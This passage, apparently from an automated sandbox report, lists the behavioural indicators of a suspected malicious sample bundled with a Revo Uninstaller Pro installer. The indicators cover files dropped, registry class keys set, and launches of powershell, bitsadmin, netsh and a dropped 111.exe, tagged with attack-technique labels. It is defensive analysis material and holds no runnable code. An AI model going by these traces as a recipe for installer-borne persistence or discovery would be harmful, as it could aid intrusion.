| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-4N1NQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe | C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp | N/A |
| File created | C:\Program Files (x86)\is-U6KOT.tmp | C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-CRER1.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-ISCMV.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-55INN.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-9P2QL.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-931CM.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1RODL.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-JFCQE.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-3TS51.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-6UR6Q.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-Q8BBP.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-39OPA.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-3JF08.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-8495I.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-JTHFQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-28FML.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-9IIPE.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-RFR70.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-GSVS2.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-6EHPV.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-SQB8P.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-PVVH9.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-59SL6.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File opened for modification | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-T4M4R.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-RJHJR.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-J94CH.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-8LUA5.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-BI39F.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-7RO2T.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-0F60D.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-4R7ND.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-CV8TO.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-M9TL8.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-78MGP.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File opened for modification | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exe | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File opened for modification | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-Q4T3N.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-S2T3L.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-DT655.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-AD34U.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-L6J3P.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-11GRQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-HA11U.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File opened for modification | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SetupCache\v4.7.03062\DisplayIcon.ico | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.app.log | C:\Windows\system32\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-A90000000001}\SC_Reader.exe | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\uzlyLtM20yixSdV\111.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\uzlyLtM20yixSdV\111.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mode.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\runonce.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\runonce.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.ruel\ = "RevoUninstallerPro.ruel" | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\ = "RUShellExt Class" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\InprocServer32\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RUExt.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ProgID | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272} | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\RevoUninstallerPro.ruel\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4} | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\TypeLib\ = "{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\RevoUninstallerPro.ruel\shell | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open\command\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe /implog \"%1\"" | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\0\win32\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\ruplp.exe" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510 | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib\ = "{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272} | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\DefaultIcon\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe,0" | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\RevoUninstallerPro.ruel\shell\open | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\ = "LicProtector Library" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\.ruel | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open\command | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\RUShellExt | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F} | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1 | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ = "LicProtector Object" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\ = "Revo Uninstaller Pro" | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell\Open | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\.ruel | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{1D928D64-60D3-4FAC-B810-C4D9D8A680CF}\ = "RUExt" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Msi.Package\shellex\ContextMenuHandlers\RUShellExt | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ = "ILicProtectorEXE510" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ProxyStubClsid32 | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\Version | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\RevoUninstallerPro.ruel\shell\open\command | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\0\win32 | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib\ = "{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ProgID\ = "LicProtector.LicProtectorEXE510" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510\Clsid\ = "{DD72B942-27D2-4A3C-9353-FA0441FBABA0}" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\InfoTip = "Uninstall, Remove Programs, Clear Web Browsers Tracks, Control Automatically Started Applications" | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
